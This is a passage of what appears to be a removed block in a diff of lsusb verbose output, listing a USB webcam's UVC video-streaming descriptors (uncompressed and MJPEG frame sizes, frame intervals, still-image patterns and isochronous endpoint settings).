-        bmaControls( 1)                    27
-        bmaControls( 2)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors               18
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           400
-        dwMinBitRate                 20480000
-        dwMaxBitRate                122880000
-        dwMaxVideoFrameBufferSize      512000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            768
-        wHeight                           480
-        dwMinBitRate                 29491200
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      737280
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           456
-        dwMinBitRate                 29184000
-        dwMaxBitRate                145920000
-        dwMaxVideoFrameBufferSize      729600
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           504
-        dwMinBitRate                 32256000
-        dwMaxBitRate                161280000
-        dwMaxVideoFrameBufferSize      806400
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                192000000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  3
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           800
-        dwMinBitRate                 81920000
-        dwMaxBitRate                163840000
-        dwMaxVideoFrameBufferSize     2048000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           904
-        dwMinBitRate                115712000
-        dwMaxBitRate                115712000
-        dwMaxVideoFrameBufferSize     2892800
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1000
-        dwMinBitRate                128000000
-        dwMaxBitRate                128000000
-        dwMaxVideoFrameBufferSize     3200000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                153600000
-        dwMaxBitRate                153600000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            79
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns              18
-        wWidth( 0)                        640
-        wHeight( 0)                       480
-        wWidth( 1)                        160
-        wHeight( 1)                       120
-        wWidth( 2)                        176
-        wHeight( 2)                       144
-        wWidth( 3)                        320
-        wHeight( 3)                       240
-        wWidth( 4)                        352
-        wHeight( 4)                       288
-        wWidth( 5)                        640
-        wHeight( 5)                       360
-        wWidth( 6)                        640
-        wHeight( 6)                       400
-        wWidth( 7)                        768
-        wHeight( 7)                       480
-        wWidth( 8)                        800
-        wHeight( 8)                       456
-        wWidth( 9)                        800
-        wHeight( 9)                       504
-        wWidth(10)                        800
-        wHeight(10)                       600
-        wWidth(11)                        864
-        wHeight(11)                       480
-        wWidth(12)                        960
-        wHeight(12)                       720
-        wWidth(13)                       1280
-        wHeight(13)                       720
-        wWidth(14)                       1280
-        wHeight(14)                       800
-        wWidth(15)                       1600
-        wHeight(15)                       904
-        wWidth(16)                       1600
-        wHeight(16)                      1000
-        wWidth(17)                       1600
-        wHeight(17)                      1200
-        bNumCompressionPatterns            18
-        bCompression( 0)                    5
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        2
-        bNumFrameDescriptors               18
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           400
-        dwMinBitRate                 20480000
-        dwMaxBitRate                122880000
-        dwMaxVideoFrameBufferSize      512000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            768
-        wHeight                           480
-        dwMinBitRate                 29491200
-        dwMaxBitRate                176947200
-        dwMaxVideoFrameBufferSize      737280
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           456
-        dwMinBitRate                 29184000
-        dwMaxBitRate                175104000
-        dwMaxVideoFrameBufferSize      729600
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           504
-        dwMinBitRate                 32256000
-        dwMaxBitRate                193536000
-        dwMaxVideoFrameBufferSize      806400
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           800
-        dwMinBitRate                 81920000
-        dwMaxBitRate                409600000
-        dwMaxVideoFrameBufferSize     2048000
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           904
-        dwMinBitRate                115712000
-        dwMaxBitRate                231424000
-        dwMaxVideoFrameBufferSize     2892800
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1000
-        dwMinBitRate                128000000
-        dwMaxBitRate                256000000
-        dwMaxVideoFrameBufferSize     3200000
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                153600000
-        dwMaxBitRate                307200000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            83
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns              18
-        wWidth( 0)                        640
-        wHeight( 0)                       480
-        wWidth( 1)                        160
-        wHeight( 1)                       120
-        wWidth( 2)                        176
-        wHeight( 2)                       144
-        wWidth( 3)                        320
-        wHeight( 3)                       240
-        wWidth( 4)                        352
-        wHeight( 4)                       288
-        wWidth( 5)                        640
-        wHeight( 5)                       360
-        wWidth( 6)                        640
-        wHeight( 6)                       400
-        wWidth( 7)                        768
-        wHeight( 7)                       480
-        wWidth( 8)                        800
-        wHeight( 8)                       456
-        wWidth( 9)                        800
-        wHeight( 9)                       504
-        wWidth(10)                        800
-        wHeight(10)                       600
-        wWidth(11)                        864
-        wHeight(11)                       480
-        wWidth(12)                        960
-        wHeight(12)                       720
-        wWidth(13)                       1280
-        wHeight(13)                       720
-        wWidth(14)                       1280
-        wHeight(14)                       800
-        wWidth(15)                       1600
-        wHeight(15)                       904
-        wWidth(16)                       1600
-        wHeight(16)                      1000
-        wWidth(17)                       1600
-        wHeight(17)                      1200
-        bNumCompressionPatterns            18
-        bCompression( 0)                    5
-        bCompression( 1)                   10
-        bCompression( 2)                   15
-        bCompression( 3)                   20
-        bCompression( 4)                   25
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c0  1x 192 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0180  1x 384 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0280  1x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0320  1x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x03b0  1x 944 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
